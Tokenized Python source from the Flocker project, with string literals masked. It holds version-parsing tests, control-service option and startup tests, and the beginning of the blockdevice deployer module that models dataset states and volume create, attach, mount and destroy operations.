is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DocReleaseDirtyTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> dirty = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> LegacyPreReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> pre_release = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> is_legacy = True , <EOL> ) , <EOL> ) <EOL> LegacyDocReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> is_legacy = True , <EOL> ) , <EOL> ) <EOL> class GetPreReleaseTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotAPreRelease , get_pre_release , '<STR_LIT>' ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_pre_release ( '<STR_LIT>' ) , <NUM_LIT:3> ) <EOL> class TargetReleaseTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_not_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotAPreRelease , target_release , '<STR_LIT>' ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( target_release ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> class GetPackageKeySuffixTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_marketing_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_documentation_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_non_marketing_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> def test_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( get_package_key_suffix ( '<STR_LIT>' ) , "<STR_LIT>" ) </s>
<s> from twisted . python . filepath import FilePath <EOL> from . . script import ControlOptions , ControlScript <EOL> from ... testtools import ( <EOL> MemoryCoreReactor , make_standard_options_test , TestCase , <EOL> ) <EOL> from . . _clusterstate import ClusterStateService <EOL> from . . httpapi import REST_API_PORT <EOL> from ... ca . testtools import get_credential_sets <EOL> class ControlOptionsTests ( make_standard_options_test ( ControlOptions ) ) : <EOL> """<STR_LIT>""" <EOL> def test_default_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT:port>" ] , b'<STR_LIT>' % ( REST_API_PORT , ) ) <EOL> def test_custom_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT:port>" ] , b"<STR_LIT>" ) <EOL> def test_default_path ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , FilePath ( b"<STR_LIT>" ) ) <EOL> def test_path ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , FilePath ( b"<STR_LIT>" ) ) <EOL> def test_default_agent_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , b'<STR_LIT>' ) <EOL> def test_custom_agent_port ( self ) : <EOL> """<STR_LIT>""" <EOL> options = ControlOptions ( ) <EOL> options . parseOptions ( [ b"<STR_LIT>" , b"<STR_LIT>" ] ) <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , b"<STR_LIT>" ) <EOL> class ControlScriptTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ControlScriptTests , self ) . setUp ( ) <EOL> ca_set , _ = get_credential_sets ( ) <EOL> self . certificate_path = FilePath ( self . mktemp ( ) ) <EOL> self . certificate_path . makedirs ( ) <EOL> ca_set . copy_to ( self . certificate_path , control = True ) <EOL> self . script = ControlScript ( ) <EOL> self . options = ControlOptions ( ) <EOL> self . data_path = FilePath ( self . mktemp ( ) ) <EOL> self . options . parseOptions ( [ <EOL> b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , self . data_path . path , <EOL> b"<STR_LIT>" , self . certificate_path . path <EOL> ] ) <EOL> def test_no_immediate_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertNoResult ( <EOL> self . script . main ( MemoryCoreReactor ( ) , self . options ) ) <EOL> def test_starts_persistence_service ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryCoreReactor ( ) <EOL> self . script . main ( reactor , self . options ) <EOL> self . assertTrue ( self . data_path . isdir ( ) ) <EOL> def test_starts_cluster_state_service ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryCoreReactor ( ) <EOL> self . script . main ( reactor , self . options ) <EOL> server = reactor . tcpServers [ <NUM_LIT:0> ] <EOL> control_resource = server [ <NUM_LIT:1> ] . wrappedFactory . resource <EOL> service = control_resource . _v1_user . cluster_state_service <EOL> self . assertEqual ( ( service . __class__ , service . running ) , <EOL> ( ClusterStateService , True ) ) </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> from uuid import UUID <EOL> from stat import S_IRWXU , S_IRWXG , S_IRWXO <EOL> from errno import EEXIST <EOL> from datetime import timedelta <EOL> from eliot import MessageType , ActionType , Field , Logger <EOL> from eliot . serializers import identity <EOL> from zope . interface import implementer , Interface , provider <EOL> from pyrsistent import PClass , field , pmap_field , pset_field , thaw , CheckedPMap <EOL> from characteristic import with_cmp <EOL> from twisted . python . reflect import safe_repr <EOL> from twisted . internet . defer import succeed , fail <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . python . components import proxyForInterface <EOL> from twisted . python . constants import ( <EOL> Values , ValueConstant , <EOL> Names , NamedConstant , <EOL> ) <EOL> from . blockdevice_manager import BlockDeviceManager <EOL> from . _logging import DATASET_ID , COUNT <EOL> from . . import ( <EOL> IDeployer , ILocalState , IStateChange , in_parallel , NoOp , <EOL> ) <EOL> from . . _deploy import NotInUseDatasets <EOL> from ... control import NodeState , Manifestation , Dataset , NonManifestDatasets <EOL> from ... control . _model import pvector_field <EOL> from ... common import RACKSPACE_MINIMUM_VOLUME_SIZE , auto_threaded , provides <EOL> from ... common . algebraic import TaggedUnionInvariant <EOL> _logger = Logger ( ) <EOL> DEFAULT_DATASET_SIZE = RACKSPACE_MINIMUM_VOLUME_SIZE <EOL> PROFILE_METADATA_KEY = u"<STR_LIT>" <EOL> class DatasetStates ( Names ) : <EOL> """<STR_LIT>""" <EOL> NON_EXISTENT = NamedConstant ( ) <EOL> UNREGISTERED = NamedConstant ( ) <EOL> REGISTERED = NamedConstant ( ) <EOL> ATTACHED_ELSEWHERE = NamedConstant ( ) <EOL> ATTACHED_TO_DEAD_NODE = NamedConstant ( ) <EOL> NON_MANIFEST = NamedConstant ( ) <EOL> ATTACHED_NO_FILESYSTEM = NamedConstant ( ) <EOL> ATTACHED = NamedConstant ( ) <EOL> MOUNTED = NamedConstant ( ) <EOL> DELETED = NamedConstant ( ) <EOL> class DiscoveredDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> state = field ( <EOL> invariant = lambda state : ( state in DatasetStates . iterconstants ( ) , <EOL> "<STR_LIT>" ) , <EOL> mandatory = True , <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> maximum_size = field ( type = int ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> device_path = field ( FilePath ) <EOL> mount_point = field ( FilePath ) <EOL> __invariant__ = TaggedUnionInvariant ( <EOL> tag_attribute = '<STR_LIT:state>' , <EOL> attributes_for_tag = { <EOL> DatasetStates . ATTACHED_ELSEWHERE : { '<STR_LIT>' } , <EOL> DatasetStates . ATTACHED_TO_DEAD_NODE : { '<STR_LIT>' } , <EOL> DatasetStates . NON_MANIFEST : { '<STR_LIT>' } , <EOL> DatasetStates . UNREGISTERED : { '<STR_LIT>' } , <EOL> DatasetStates . REGISTERED : set ( ) , <EOL> DatasetStates . ATTACHED_NO_FILESYSTEM : { <EOL> '<STR_LIT>' , '<STR_LIT>' } , <EOL> DatasetStates . ATTACHED : { <EOL> '<STR_LIT>' , '<STR_LIT>' } , <EOL> DatasetStates . MOUNTED : { <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' } , <EOL> } , <EOL> ) <EOL> class DesiredDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> state = field ( <EOL> invariant = lambda state : ( state in DatasetStates . iterconstants ( ) , <EOL> "<STR_LIT>" ) , <EOL> mandatory = True , <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> maximum_size = field ( type = int ) <EOL> metadata = pmap_field ( <EOL> key_type = unicode , <EOL> value_type = unicode , <EOL> ) <EOL> mount_point = field ( FilePath ) <EOL> filesystem = field ( unicode , initial = u"<STR_LIT>" , mandatory = True , <EOL> invariant = lambda v : ( v == "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> __invariant__ = TaggedUnionInvariant ( <EOL> tag_attribute = '<STR_LIT:state>' , <EOL> attributes_for_tag = { <EOL> DatasetStates . NON_MANIFEST : { "<STR_LIT>" } , <EOL> DatasetStates . MOUNTED : { "<STR_LIT>" , "<STR_LIT>" } , <EOL> DatasetStates . DELETED : set ( ) , <EOL> } , <EOL> ) <EOL> class IDatasetStateChangeFactory ( Interface ) : <EOL> def from_state_and_config ( discovered_dataset , desired_dataset ) : <EOL> """<STR_LIT>""" <EOL> class ICalculator ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def calculate_changes_for_datasets ( <EOL> discovered_datasets , desired_datasets , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> class VolumeException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice_id ) : <EOL> if not isinstance ( blockdevice_id , unicode ) : <EOL> raise TypeError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( blockdevice_id ) <EOL> ) <EOL> Exception . __init__ ( self , blockdevice_id ) <EOL> self . blockdevice_id = blockdevice_id <EOL> class UnknownVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class AlreadyAttachedVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class UnattachedVolume ( VolumeException ) : <EOL> """<STR_LIT>""" <EOL> class DatasetExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice ) : <EOL> Exception . __init__ ( self , blockdevice ) <EOL> self . blockdevice = blockdevice <EOL> class FilesystemExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , device ) : <EOL> Exception . __init__ ( self , device ) <EOL> self . device = device <EOL> class UnknownInstanceID ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , blockdevice ) : <EOL> Exception . __init__ ( <EOL> self , <EOL> '<STR_LIT>' . format ( blockdevice ) ) <EOL> self . blockdevice = blockdevice <EOL> DATASET = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda dataset : dataset . dataset_id , <EOL> u"<STR_LIT>" <EOL> ) <EOL> VOLUME = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda volume : volume . blockdevice_id , <EOL> u"<STR_LIT>" <EOL> ) <EOL> FILESYSTEM_TYPE = Field . forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ unicode ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MOUNTPOINT = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda path : path . path , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> BLOCK_DEVICE_ID = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda id : unicode ( id ) , <EOL> u"<STR_LIT>" <EOL> ) <EOL> BLOCK_DEVICE_SIZE = Field ( <EOL> u"<STR_LIT>" , <EOL> identity , <EOL> u"<STR_LIT>" <EOL> ) <EOL> BLOCK_DEVICE_COMPUTE_INSTANCE_ID = Field ( <EOL> u"<STR_LIT>" , <EOL> identity , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> BLOCK_DEVICE_PATH = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda path : path . path , <EOL> u"<STR_LIT>" <EOL> ) <EOL> PROFILE_NAME = Field . forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ unicode ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MAXIMUM_SIZE = Field . forTypes ( <EOL> u"<STR_LIT>" , <EOL> [ int ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> METADATA = Field ( <EOL> u"<STR_LIT>" , <EOL> thaw , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> CREATE_BLOCK_DEVICE_DATASET = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , MAXIMUM_SIZE , METADATA ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> UNMOUNT_BLOCK_DEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> UNMOUNT_BLOCK_DEVICE_DETAILS = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_ID , BLOCK_DEVICE_PATH ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> MOUNT_BLOCK_DEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_PATH ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> MOUNT_BLOCK_DEVICE_DETAILS = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_PATH ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> ATTACH_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> DETACH_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> DESTROY_VOLUME = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" <EOL> ) <EOL> CREATE_FILESYSTEM = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ BLOCK_DEVICE_PATH , FILESYSTEM_TYPE ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> INVALID_DEVICE_PATH_VALUE = Field ( <EOL> u"<STR_LIT>" , <EOL> lambda value : safe_repr ( value ) , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> INVALID_DEVICE_PATH = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , INVALID_DEVICE_PATH_VALUE ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" , <EOL> ) <EOL> CREATE_VOLUME_PROFILE_DROPPED = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , PROFILE_NAME ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> ) <EOL> DISCOVERED_RAW_STATE = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ Field ( u"<STR_LIT>" , safe_repr ) ] , <EOL> u"<STR_LIT>" ) <EOL> UNREGISTERED_VOLUME_ATTACHED = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> ) <EOL> FUNCTION_NAME = Field . for_types ( <EOL> "<STR_LIT>" , [ bytes , unicode ] , <EOL> u"<STR_LIT>" ) <EOL> CALL_LIST_VOLUMES = MessageType ( <EOL> u"<STR_LIT>" , <EOL> [ FUNCTION_NAME , COUNT ] , <EOL> u"<STR_LIT>" , ) <EOL> REGISTER_BLOCKDEVICE = ActionType ( <EOL> u"<STR_LIT>" , <EOL> [ DATASET_ID , BLOCK_DEVICE_ID ] , <EOL> [ ] , <EOL> u"<STR_LIT>" , <EOL> ) <EOL> def _volume_field ( ) : <EOL> """<STR_LIT>""" <EOL> return field ( <EOL> type = BlockDeviceVolume , mandatory = True , <EOL> factory = lambda x : x <EOL> ) <EOL> @ with_cmp ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:size>" , "<STR_LIT>" ] ) <EOL> class BlockDeviceVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> size = field ( type = int , mandatory = True ) <EOL> attached_to = field ( <EOL> type = ( unicode , type ( None ) ) , initial = None , mandatory = True <EOL> ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> def _blockdevice_volume_from_datasetid ( volumes , dataset_id ) : <EOL> """<STR_LIT>""" <EOL> for volume in volumes : <EOL> if volume . dataset_id == dataset_id : <EOL> return volume <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class CreateFilesystem ( PClass ) : <EOL> """<STR_LIT>""" <EOL> device = field ( type = FilePath , mandatory = True ) <EOL> filesystem = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> device = discovered_dataset . device_path , <EOL> filesystem = desired_dataset . filesystem , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return CREATE_FILESYSTEM ( <EOL> _logger , block_device_path = self . device , <EOL> filesystem_type = self . filesystem <EOL> ) <EOL> def run ( self , deployer , state_persister ) : <EOL> try : <EOL> _ensure_no_filesystem ( self . device , deployer . block_device_manager ) <EOL> deployer . block_device_manager . make_filesystem ( self . device , <EOL> self . filesystem ) <EOL> except : <EOL> return fail ( ) <EOL> return succeed ( None ) <EOL> def _ensure_no_filesystem ( device , block_device_manager ) : <EOL> """<STR_LIT>""" <EOL> if block_device_manager . has_filesystem ( device ) : <EOL> raise FilesystemExists ( device ) <EOL> def _valid_size ( size ) : <EOL> """<STR_LIT>""" <EOL> if size % <NUM_LIT> == <NUM_LIT:0> : <EOL> return ( True , "<STR_LIT>" ) <EOL> return ( <EOL> False , "<STR_LIT>" % ( size , ) <EOL> ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class MountBlockDevice ( PClass ) : <EOL> """<STR_LIT>""" <EOL> device_path = field ( type = FilePath , mandatory = True ) <EOL> mountpoint = field ( type = FilePath , mandatory = True ) <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = desired_dataset . dataset_id , <EOL> device_path = discovered_dataset . device_path , <EOL> mountpoint = desired_dataset . mount_point , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return MOUNT_BLOCK_DEVICE ( _logger , dataset_id = self . dataset_id , <EOL> block_device_path = self . device_path ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . mountpoint . makedirs ( ) <EOL> except OSError as e : <EOL> if e . errno != EEXIST : <EOL> return fail ( ) <EOL> self . mountpoint . parent ( ) . chmod ( S_IRWXU ) <EOL> deployer . block_device_manager . mount ( self . device_path , self . mountpoint ) <EOL> lostfound = self . mountpoint . child ( b"<STR_LIT>" ) <EOL> if self . mountpoint . children ( ) == [ lostfound ] : <EOL> lostfound . remove ( ) <EOL> self . mountpoint . chmod ( S_IRWXU | S_IRWXG | S_IRWXO ) <EOL> self . mountpoint . restat ( ) <EOL> return succeed ( None ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class UnmountBlockDevice ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return UNMOUNT_BLOCK_DEVICE ( _logger , dataset_id = self . dataset_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> deferred_device_path = api . get_device_path ( self . blockdevice_id ) <EOL> def got_device ( device ) : <EOL> UNMOUNT_BLOCK_DEVICE_DETAILS ( <EOL> block_device_id = self . blockdevice_id , <EOL> block_device_path = device <EOL> ) . write ( _logger ) <EOL> deployer . block_device_manager . unmount ( device ) <EOL> deferred_device_path . addCallback ( got_device ) <EOL> return deferred_device_path <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class AttachVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return ATTACH_VOLUME ( _logger , dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> getting_id = api . compute_instance_id ( ) <EOL> def got_compute_id ( compute_instance_id ) : <EOL> return api . attach_volume ( <EOL> self . blockdevice_id , <EOL> attach_to = compute_instance_id , <EOL> ) <EOL> attaching = getting_id . addCallback ( got_compute_id ) <EOL> return attaching <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DetachVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return DETACH_VOLUME ( _logger , dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> return api . detach_volume ( self . blockdevice_id ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class DestroyVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( blockdevice_id = discovered_dataset . blockdevice_id ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return DESTROY_VOLUME ( _logger , block_device_id = self . blockdevice_id ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . async_block_device_api <EOL> return api . destroy_volume ( self . blockdevice_id ) <EOL> def allocated_size ( allocation_unit , requested_size ) : <EOL> """<STR_LIT>""" <EOL> allocation_unit = int ( allocation_unit ) <EOL> requested_size = int ( requested_size ) <EOL> previous_interval_size = ( <EOL> ( requested_size // allocation_unit ) * allocation_unit <EOL> ) <EOL> if previous_interval_size < requested_size : <EOL> return previous_interval_size + allocation_unit <EOL> else : <EOL> return requested_size <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class CreateBlockDeviceDataset ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( UUID , mandatory = True ) <EOL> maximum_size = field ( int , mandatory = True ) <EOL> metadata = pmap_field ( unicode , unicode ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = desired_dataset . dataset_id , <EOL> maximum_size = desired_dataset . maximum_size , <EOL> metadata = desired_dataset . metadata , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return CREATE_BLOCK_DEVICE_DATASET ( <EOL> _logger , <EOL> dataset_id = self . dataset_id , <EOL> maximum_size = self . maximum_size , <EOL> metadata = self . metadata , <EOL> ) <EOL> def _create_volume ( self , deployer ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . block_device_api <EOL> profile_name = self . metadata . get ( PROFILE_METADATA_KEY ) <EOL> size = allocated_size ( allocation_unit = api . allocation_unit ( ) , <EOL> requested_size = self . maximum_size ) <EOL> if profile_name : <EOL> return ( <EOL> deployer . profiled_blockdevice_api . create_volume_with_profile ( <EOL> dataset_id = self . dataset_id , <EOL> size = size , <EOL> profile_name = profile_name <EOL> ) <EOL> ) <EOL> else : <EOL> return api . create_volume ( dataset_id = self . dataset_id , size = size ) <EOL> def run ( self , deployer , state_persister ) : <EOL> """<STR_LIT>""" <EOL> api = deployer . block_device_api <EOL> try : <EOL> check_for_existing_dataset ( api , self . dataset_id ) <EOL> except : <EOL> return fail ( ) <EOL> return self . _create_volume ( deployer ) <EOL> @ implementer ( IStateChange ) <EOL> @ provider ( IDatasetStateChangeFactory ) <EOL> class RegisterVolume ( PClass ) : <EOL> """<STR_LIT>""" <EOL> dataset_id = field ( type = UUID , mandatory = True ) <EOL> blockdevice_id = field ( type = unicode , mandatory = True ) <EOL> @ classmethod <EOL> def from_state_and_config ( cls , discovered_dataset , desired_dataset ) : <EOL> return cls ( <EOL> dataset_id = discovered_dataset . dataset_id , <EOL> blockdevice_id = discovered_dataset . blockdevice_id , <EOL> ) <EOL> @ property <EOL> def eliot_action ( self ) : <EOL> return REGISTER_BLOCKDEVICE ( <EOL> dataset_id = self . dataset_id , <EOL> block_device_id = self . blockdevice_id , <EOL> ) <EOL> def run ( self , deployer , state_persister ) : <EOL> return state_persister . record_ownership ( <EOL> dataset_id = self . dataset_id , <EOL> blockdevice_id = self . blockdevice_id , <EOL> ) <EOL> class IBlockDeviceAsyncAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def allocation_unit ( ) : <EOL> """<STR_LIT>""" <EOL> def compute_instance_id ( ) : <EOL> """<STR_LIT>""" <EOL> def create_volume ( dataset_id , size ) : <EOL> """<STR_LIT>""" <EOL> def destroy_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def attach_volume ( blockdevice_id , attach_to ) : <EOL> """<STR_LIT>""" <EOL> def detach_volume ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> def list_volumes ( ) : <EOL> """<STR_LIT>""" <EOL> def get_device_path ( blockdevice_id ) : <EOL> """<STR_LIT>""" <EOL> class IBlockDeviceAPI ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def allocation_unit ( ) : <EOL> """<STR_LIT>""" <EOL> def compute_instance_id ( ) : <EOL> """<STR_LIT>""" <EOL> def create_volume ( dataset_id , 